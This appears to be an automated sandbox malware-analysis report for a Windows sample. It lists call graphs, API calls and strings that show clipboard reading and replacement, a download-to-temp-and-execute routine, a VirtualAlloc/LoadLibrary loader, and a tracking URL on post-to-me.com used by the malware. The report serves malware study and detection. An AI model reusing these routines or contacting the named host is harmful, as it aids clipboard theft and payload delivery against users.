65322 4332e0 65369 42a58d 26 API calls _Deallocate 65322->65369 65325 4328f8 __fread_nolock 26 API calls 65324->65325 65327 433366 65325->65327 65338 432e06 65327->65338 65329 43336d 65330 4328f8 __fread_nolock 26 API calls 65329->65330 65329->65332 65331 433399 65330->65331 65331->65332 65333 4328f8 __fread_nolock 26 API calls 65331->65333 65334 4333a7 65333->65334 65334->65332 65335 4328f8 __fread_nolock 26 API calls 65334->65335 65336 4333b7 65335->65336 65337 4328f8 __fread_nolock 26 API calls 65336->65337 65337->65332 65339 432e12 ___DestructExceptionObject 65338->65339 65340 432e32 65339->65340 65341 432e1a 65339->65341 65343 432ef8 65340->65343 65346 432e6b 65340->65346 65437 42eaa6 20 API calls _free 65341->65437 65444 42eaa6 20 API calls _free 65343->65444 65345 432e1f 65438 42eab9 20 API calls _free 65345->65438 65349 432e7a 65346->65349 65350 432e8f 65346->65350 65347 432efd 65445 42eab9 20 API calls _free 65347->65445 65439 42eaa6 20 API calls _free 65349->65439 65371 439694 EnterCriticalSection 65350->65371 65354 432e87 65446 42a58d 26 API calls _Deallocate 65354->65446 65355 432e7f 65440 42eab9 20 API calls _free 65355->65440 65356 432e95 65358 432eb1 65356->65358 65359 432ec6 65356->65359 65441 42eab9 20 API calls _free 65358->65441 65372 432f19 65359->65372 65361 432e27 __fread_nolock 65361->65329 65364 432ec1 65443 432ef0 LeaveCriticalSection __wsopen_s 65364->65443 65365 432eb6 65442 42eaa6 20 API calls _free 65365->65442 65368->65322 65369->65332 65370->65324 65371->65356 65373 432f43 65372->65373 65374 432f2b 65372->65374 65376 4332ad 65373->65376 65383 432f88 65373->65383 65456 42eaa6 20 API calls _free 65374->65456 65474 42eaa6 20 API calls _free 65376->65474 65377 432f30 65457 42eab9 20 API calls _free 65377->65457 65380 4332b2 65475 42eab9 20 API calls _free 65380->65475 65382 432f93 65458 42eaa6 20 API calls _free 65382->65458 65383->65382 65384 432f38 65383->65384 65388 432fc3 65383->65388 65384->65364 65385 432fa0 65476 42a58d 26 API calls _Deallocate 65385->65476 65387 432f98 65459 42eab9 20 API calls _free 65387->65459 65391 432fdc 65388->65391 65392 433002 65388->65392 65393 43301e 65388->65393 65391->65392 65400 432fe9 65391->65400 65460 42eaa6 20 API calls _free 65392->65460 65463 433697 21 API calls 3 library calls 65393->65463 65395 433007 65461 42eab9 20 API calls _free 65395->65461 65397 433035 65401 43345a _free 20 API calls 65397->65401 65447 43d355 65400->65447 65404 43303e 65401->65404 65402 43300e 65462 42a58d 26 API calls _Deallocate 65402->65462 65403 433187 65406 4331fd 65403->65406 65409 4331a0 GetConsoleMode 65403->65409 65407 43345a _free 20 API calls 65404->65407 65408 433201 ReadFile 65406->65408 65410 433045 65407->65410 65411 433275 GetLastError 65408->65411 65412 43321b 65408->65412 65409->65406 65413 4331b1 65409->65413 65414 43306a 65410->65414 65415 43304f 65410->65415 65416 433282 65411->65416 65417 4331d9 65411->65417 65412->65411 65418 4331f2 65412->65418 65413->65408 65419 4331b7 ReadConsoleW 65413->65419 65466 4347de 65414->65466 65464 42eab9 20 API calls _free 65415->65464 65472 42eab9 20 API calls _free 65416->65472 65435 433019 __fread_nolock 65417->65435 65469 42ea83 20 API calls 2 library calls 65417->65469 65430 433240 65418->65430 65431 433257 65418->65431 65418->65435 65419->65418 65424 4331d3 GetLastError 65419->65424 65420 43345a _free 20 API calls 65420->65384 65424->65417 65426 433054 65465 42eaa6 20 API calls _free 65426->65465 65427 433287 65473 42eaa6 20 API calls _free 65427->65473 65470 432c35 31 API calls 3 library calls 65430->65470 65432 43326e 65431->65432 65431->65435 65471 432a75 29 API calls __fread_nolock 65432->65471 65435->65420 65436 433273 65436->65435 65437->65345 65438->65361 65439->65355 65440->65354 65441->65365 65442->65364 65443->65361 65444->65347 65445->65354 65446->65361 65448 43d362 65447->65448 65449 43d36f 65447->65449 65477 42eab9 20 API calls _free 65448->65477 65451 43d37b 65449->65451 65478 42eab9 20 API calls _free 65449->65478 65451->65403 65453 43d39c 65479 42a58d 26 API calls _Deallocate 65453->65479 65454 43d367 65454->65403 65456->65377 65457->65384 65458->65387 65459->65385 65460->65395 65461->65402 65462->65435 65463->65397 65464->65426 65465->65435 65467 434745 __fread_nolock 28 API calls 65466->65467 65468 4347f4 65467->65468 65468->65400 65469->65435 65470->65435 65471->65436 65472->65427 65473->65435 65474->65380 65475->65385 65476->65384 65477->65454 65478->65453 65479->65454 65480 70867e 65481 708681 65480->65481 65484 709003 65481->65484 65485 708fde 65481->65485 65486 708fed 65485->65486 65489 70977e 65486->65489 65494 709799 65489->65494 65490 7097a2 CreateToolhelp32Snapshot 65491 7097be Module32First 65490->65491 65490->65494 65492 7097cd 65491->65492 65495 708fdd 65491->65495 65496 70943d 65492->65496 65494->65490 65494->65491 65497 709468 65496->65497 65498 7094b1 65497->65498 65499 709479 VirtualAlloc 65497->65499 65498->65498 65499->65498

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                                            • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                              • Part of subcall function 0040CC06: _strlen.LIBCMT ref: 0040CC1D
                                                                            • OpenClipboard.USER32(00000000), ref: 0040171D
                                                                            • GetClipboardData.USER32(00000001), ref: 0040172D
                                                                            • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                                            • _strlen.LIBCMT ref: 00401749
                                                                            • _strlen.LIBCMT ref: 00401778
                                                                            • _strlen.LIBCMT ref: 004018BC
                                                                            • EmptyClipboard.USER32 ref: 004018D2
                                                                            • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                                            • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                            • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                            • CloseClipboard.USER32 ref: 0040193D
                                                                            • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                            • String ID: i
                                                                            • API String ID: 1583243082-3865851505
                                                                            • Opcode ID: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
                                                                            • Instruction ID: 84ae510e80891b91da9cfa011cccf91080e50da4f88b7c16b45420ac6e32ace8
                                                                            • Opcode Fuzzy Hash: 072d9209b8aa05484b0dd52e5136abbefd00641ef5953900f6baf6aec7d9e9a8
                                                                            • Instruction Fuzzy Hash: BB51F331C00384DAE711ABA4EC467AD7774FF29306F04523AE805B22B3EB789A85C75D

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A0D
                                                                            • InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 00402A23
                                                                            • GetTempPathW.KERNEL32(00000105,?), ref: 00402A3F
                                                                            • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A55
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A8E
                                                                            • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402ACA
                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AE7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00402AFD
                                                                            • ShellExecuteExW.SHELL32(?), ref: 00402B5E
                                                                            • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B73
                                                                            • CloseHandle.KERNEL32(?), ref: 00402B7F
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00402B88
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00402B8B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                            • String ID: .exe$<$ShareScreen
                                                                            • API String ID: 3323492106-493228180
                                                                            • Opcode ID: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
                                                                            • Instruction ID: 1f3e70d10a2fb6dcbdd3680cf8e7ca54fef569da526477a1452c3d554320dc38
                                                                            • Opcode Fuzzy Hash: 1dbf5c5b49a49902ab9d2a0bf01cad431bac49eb19a8523191ea84d20cf0df56
                                                                            • Instruction Fuzzy Hash: 6C41847190021CAFEB209F549D85FEA77BCFF04745F0080F6A548E2190DE749E858FA4
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007097A6
                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 007097C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666285688.0000000000708000.00000040.00000020.00020000.00000000.sdmp, Offset: 00708000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_708000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                            • String ID:
                                                                            • API String ID: 3833638111-0
                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                            • Instruction ID: 7670e7082f28d14a28d872800dd6cf5ba6be259d4f9bf972caab4144871a3029
                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                            • Instruction Fuzzy Hash: 45F06232610710EBE7202FB5A88DBAA76E8AF49724F101628E752915C2DA74EC454A61

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 74 43d02c-43d05c call 43cd8f 77 43d077-43d083 call 43976e 74->77 78 43d05e-43d069 call 42eaa6 74->78 84 43d085-43d09a call 42eaa6 call 42eab9 77->84 85 43d09c-43d0e5 call 43ccfa 77->85 83 43d06b-43d072 call 42eab9 78->83 94 43d34e-43d354 83->94 84->83 92 43d152-43d15b GetFileType 85->92 93 43d0e7-43d0f0 85->93 98 43d1a4-43d1a7 92->98 99 43d15d-43d18e GetLastError call 42ea83 CloseHandle 92->99 96 43d0f2-43d0f6 93->96 97 43d127-43d14d GetLastError call 42ea83 93->97 96->97 103 43d0f8-43d125 call 43ccfa 96->103 97->83 101 43d1b0-43d1b6 98->101 102 43d1a9-43d1ae 98->102 99->83 113 43d194-43d19f call 42eab9 99->113 106 43d1ba-43d208 call 4396b7 101->106 107 43d1b8 101->107 102->106 103->92 103->97 116 43d20a-43d216 call 43cf0b 106->116 117 43d218-43d23c call 43caad 106->117 107->106 113->83 116->117 123 43d240-43d24a call 4335bd 116->123 124 43d24f-43d292 117->124 125 43d23e 117->125 123->94 126 43d2b3-43d2c1 124->126 127 43d294-43d298 124->127 125->123 130 43d2c7-43d2cb 126->130 131 43d34c 126->131 127->126 129 43d29a-43d2ae 127->129 129->126 130->131 133 43d2cd-43d300 CloseHandle call 43ccfa 130->133 131->94 136 43d302-43d32e GetLastError call 42ea83 call 439880 133->136 137 43d334-43d348 133->137 136->137 137->131
                                                                            APIs
                                                                              • Part of subcall function 0043CCFA: CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
                                                                            • GetLastError.KERNEL32 ref: 0043D140
                                                                            • __dosmaperr.LIBCMT ref: 0043D147
                                                                            • GetFileType.KERNEL32(00000000), ref: 0043D153
                                                                            • GetLastError.KERNEL32 ref: 0043D15D
                                                                            • __dosmaperr.LIBCMT ref: 0043D166
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0043D186
                                                                            • CloseHandle.KERNEL32(?), ref: 0043D2D0
                                                                            • GetLastError.KERNEL32 ref: 0043D302
                                                                            • __dosmaperr.LIBCMT ref: 0043D309
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                            • String ID: H
                                                                            • API String ID: 4237864984-2852464175
                                                                            • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                            • Instruction ID: 76b590644e61a1e30ee63bf02a6fb5b1311e46919e71f325493a9cd527e13796
                                                                            • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                            • Instruction Fuzzy Hash: 09A14732E101049FDF19AF68EC917AE7BB1AF0A324F14115EE815AB3D1D7389D12CB5A

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 142 432f19-432f29 143 432f43-432f45 142->143 144 432f2b-432f3e call 42eaa6 call 42eab9 142->144 146 432f4b-432f51 143->146 147 4332ad-4332ba call 42eaa6 call 42eab9 143->147 158 4332c5 144->158 146->147 150 432f57-432f82 146->150 164 4332c0 call 42a58d 147->164 150->147 153 432f88-432f91 150->153 156 432f93-432fa6 call 42eaa6 call 42eab9 153->156 157 432fab-432fad 153->157 156->164 161 432fb3-432fb7 157->161 162 4332a9-4332ab 157->162 163 4332c8-4332cd 158->163 161->162 166 432fbd-432fc1 161->166 162->163 164->158 166->156 167 432fc3-432fda 166->167 170 432ff7-433000 167->170 171 432fdc-432fdf 167->171 175 433002-433019 call 42eaa6 call 42eab9 call 42a58d 170->175 176 43301e-433028 170->176 173 432fe1-432fe7 171->173 174 432fe9-432ff2 171->174 173->174 173->175 177 433093-4330ad 174->177 207 4331e0 175->207 179 43302a-43302c 176->179 180 43302f-43304d call 433697 call 43345a * 2 176->180 182 4330b3-4330c3 177->182 183 433181-43318a call 43d355 177->183 179->180 211 43306a-433090 call 4347de 180->211 212 43304f-433065 call 42eab9 call 42eaa6 180->212 182->183 188 4330c9-4330cb 182->188 196 4331fd 183->196 197 43318c-43319e 183->197 188->183 189 4330d1-4330f7 188->189 189->183 193 4330fd-433110 189->193 193->183 198 433112-433114 193->198 200 433201-433219 ReadFile 196->200 197->196 202 4331a0-4331af GetConsoleMode 197->202 198->183 203 433116-433141 198->203 205 433275-433280 GetLastError 200->205 206 43321b-433221 200->206 202->196 208 4331b1-4331b5 202->208 203->183 210 433143-433156 203->210 213 433282-433294 call 42eab9 call 42eaa6 205->213 214 433299-43329c 205->214 206->205 215 433223 206->215 209 4331e3-4331ed call 43345a 207->209 208->200 216 4331b7-4331d1 ReadConsoleW 208->216 209->163 210->183 218 433158-43315a 210->218 211->177 212->207 213->207 225 4332a2-4332a4 214->225 226 4331d9-4331df call 42ea83 214->226 222 433226-433238 215->222 223 4331d3 GetLastError 216->223 224 4331f2-4331fb 216->224 218->183 229 43315c-43317c 218->229 222->209 233 43323a-43323e 222->233 223->226 224->222 225->209 226->207 229->183 237 433240-433250 call 432c35 233->237 238 433257-433262 233->238 247 433253-433255 237->247 239 433264 call 432d85 238->239 240 43326e-433273 call 432a75 238->240 248 433269-43326c 239->248 240->248 247->209 248->247
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                            • Instruction ID: 8b8381e38334751f3c5fee40e88eacdf1446f1079df49a385922c4ea532b4e29
                                                                            • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                            • Instruction Fuzzy Hash: 4CC10670E04345AFDF11DFA9D841BAEBBB0BF0D305F14519AE805A7392C7789A41CB69

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 250 219003c-2190047 251 2190049 250->251 252 219004c-2190263 call 2190a3f call 2190e0f call 2190d90 VirtualAlloc 250->252 251->252 267 219028b-2190292 252->267 268 2190265-2190289 call 2190a69 252->268 270 21902a1-21902b0 267->270 272 21902ce-21903c2 VirtualProtect call 2190cce call 2190ce7 268->272 270->272 273 21902b2-21902cc 270->273 279 21903d1-21903e0 272->279 273->270 280 2190439-21904b8 VirtualFree 279->280 281 21903e2-2190437 call 2190ce7 279->281 283 21904be-21904cd 280->283 284 21905f4-21905fe 280->284 281->279 286 21904d3-21904dd 283->286 287 219077f-2190789 284->287 288 2190604-219060d 284->288 286->284 292 21904e3-2190505 LoadLibraryA 286->292 290 219078b-21907a3 287->290 291 21907a6-21907b0 287->291 288->287 293 2190613-2190637 288->293 290->291 294 219086e-21908be LoadLibraryA 291->294 295 21907b6-21907cb 291->295 296 2190517-2190520 292->296 297 2190507-2190515 292->297 298 219063e-2190648 293->298 303 21908c7-21908f9 294->303 299 21907d2-21907d5 295->299 300 2190526-2190547 296->300 297->300 298->287 301 219064e-219065a 298->301 304 2190824-2190833 299->304 305 21907d7-21907e0 299->305 306 219054d-2190550 300->306 301->287 302 2190660-219066a 301->302 309 219067a-2190689 302->309 311 21908fb-2190901 303->311 312 2190902-219091d 303->312 310 2190839-219083c 304->310 313 21907e2 305->313 314 21907e4-2190822 305->314 307 21905e0-21905ef 306->307 308 2190556-219056b 306->308 307->286 315 219056d 308->315 316 219056f-219057a 308->316 317 219068f-21906b2 309->317 318 2190750-219077a 309->318 310->294 319 219083e-2190847 310->319 311->312 313->304 314->299 315->307 320 219059b-21905bb 316->320 321 219057c-2190599 316->321 322 21906ef-21906fc 317->322 323 21906b4-21906ed 317->323 318->298 324 2190849 319->324 325 219084b-219086c 319->325 333 21905bd-21905db 320->333 321->333 327 219074b 322->327 328 21906fe-2190748 322->328 323->322 324->294 325->310 327->309 328->327 333->306
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0219024D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID: cess$kernel32.dll
                                                                            • API String ID: 4275171209-1230238691
                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                            • Instruction ID: 34e5879c3fa9dfaf6241a186cdac37d95b838d703bc1730e47c3dc6d49f63804
                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                            • Instruction Fuzzy Hash: 42525874A01229DFDB64CF58C984BACBBB1BF09314F1580E9E95DAB351DB30AA85CF14

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C1D
                                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E30
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00402E41
                                                                            • InternetCloseHandle.WININET(00000000), ref: 00402E44
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$CloseHandleOpen_wcslen
                                                                            • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                            • API String ID: 3067768807-1501832161
                                                                            • Opcode ID: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
                                                                            • Instruction ID: 38c4ea95430cb0d064a2c81279cd8101482ed185274a1110c797b87c00f11b19
                                                                            • Opcode Fuzzy Hash: d6968632f8314940c7590e74f8d6b13d86a5e442bc38550d54e55658f4f001bc
                                                                            • Instruction Fuzzy Hash: 4C517095A65344A9E320EBB0BC46B3633B8FF58712F10543BE518CB2F2E7B49944875E

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                            • String ID:
                                                                            • API String ID: 1687354797-0
                                                                            • Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                            • Instruction ID: ef80ad8abc8d01ee6ed88eea47d540721f1d2954bb97cc6dce8e21ba99fc2e21
                                                                            • Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                            • Instruction Fuzzy Hash: EB215172C042489ADF15EBF5D8417DEB7F8AF08318F54407FE400B62C1DB7D89448A69

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • std::_Cnd_initX.LIBCPMT ref: 00405812
                                                                            • __Cnd_signal.LIBCPMT ref: 0040581E
                                                                            • std::_Cnd_initX.LIBCPMT ref: 00405833
                                                                            • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0040583A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                            • String ID:
                                                                            • API String ID: 2059591211-0
                                                                            • Opcode ID: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                            • Instruction ID: aebd2ac95218272d728fe4b8aabd0d06745c53d3a4d3bf2acc4ab23466c53149
                                                                            • Opcode Fuzzy Hash: 7b268af305ad7e70588f0d2166d3aa4120e27ad18746cc38b88b58263b6b4356
                                                                            • Instruction Fuzzy Hash: 5FF082324007009BE7313772C80770A77A0AF04319F54883EF456769E2DBBEA8585A5D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 415 402956-4029c1 call 426820 call 42a33b call 42b444 call 402819 424 4029c3-4029c6 415->424 425 4029cf-4029e9 call 404329 call 40f8c5 415->425 424->425 426 4029c8-4029cc 424->426 426->425 429 4029ce 426->429 429->425
                                                                            APIs
                                                                            • _wcslen.LIBCMT ref: 00402985
                                                                            • __fassign.LIBCMT ref: 00402995
                                                                              • Part of subcall function 00402819: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                            • String ID: +@
                                                                            • API String ID: 2843524283-4068139069
                                                                            • Opcode ID: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
                                                                            • Instruction ID: 360ce0a8eae9c999d09f2756f3db8bce049cda3fb2da0c45bd643548fbd10a56
                                                                            • Opcode Fuzzy Hash: c4372d71d1af2a683dbfcdd1665cb533e7f75167211033e386056ce4ddc1eda8
                                                                            • Instruction Fuzzy Hash: F901D6B1E0011C5ADB24EA25ED46AEF77689B41308F1401BBA605E31C1D9785E45CA99

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                            • ExitThread.KERNEL32 ref: 0042DFCA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorExitLastThread
                                                                            • String ID: <(@
                                                                            • API String ID: 1611280651-4189137628
                                                                            • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                            • Instruction ID: e0787552ab8efb8db6d324a59155cd7370fffab00d3424d568e81b2c5b813918
                                                                            • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                            • Instruction Fuzzy Hash: 7EF0A471A00614AFDB04EFB1D80AA6D3B70FF09715F10056AF40257292CB7969558B68

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 452 42e104-42e10f 453 42e111-42e123 call 42eab9 call 42a58d 452->453 454 42e125-42e138 call 42e0bb 452->454 470 42e175-42e178 453->470 459 42e166 454->459 460 42e13a-42e157 CreateThread 454->460 464 42e168-42e174 call 42e02d 459->464 462 42e179-42e17e 460->462 463 42e159-42e165 GetLastError call 42ea83 460->463 468 42e180-42e183 462->468 469 42e185-42e187 462->469 463->459 464->470 468->469 469->464
                                                                            APIs
                                                                            • CreateThread.KERNEL32(?,?,Function_0002DFB0,00000000,?,?), ref: 0042E14D
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,0040CF04,00000000,00000000,?,?,00000000,?), ref: 0042E159
                                                                            • __dosmaperr.LIBCMT ref: 0042E160
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorLastThread__dosmaperr
                                                                            • String ID:
                                                                            • API String ID: 2744730728-0
                                                                            • Opcode ID: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                            • Instruction ID: 0446f91cba5bc1877a5460ce95bae766c471c3d01d015a917539d7ef00797947
                                                                            • Opcode Fuzzy Hash: 7111d36ae7d9c15de437581cc3a8b466686a4c726987840fc25d61e653133f3e
                                                                            • Instruction Fuzzy Hash: FF01D236600139BBDB119FA3FC05AAF7B6AEF85720F40003AF80582210DB358D21C7A9

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 473 434745-43475d call 439911 476 434770-434786 SetFilePointerEx 473->476 477 43475f-434764 call 42eab9 473->477 479 434797-4347a1 476->479 480 434788-434795 GetLastError call 42ea83 476->480 482 43476a-43476e 477->482 481 4347a3-4347b8 479->481 479->482 480->482 485 4347bd-4347c2 481->485 482->485
                                                                            APIs
                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDCB,00000000,00000002,0040DDCB,00000000,?,?,?,004347F4,00000000,00000000,0040DDCB,00000002), ref: 0043477E
                                                                            • GetLastError.KERNEL32(?,004347F4,00000000,00000000,0040DDCB,00000002,?,0042C151,?,00000000,00000000,00000001,?,0040DDCB,?,0042C206), ref: 00434788
                                                                            • __dosmaperr.LIBCMT ref: 0043478F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                                            • String ID:
                                                                            • API String ID: 2336955059-0
                                                                            • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                            • Instruction ID: 754c6ade6be4612c7e0c4d55d151f31ddb378772f23eed9c1438f533fa7de6e2
                                                                            • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
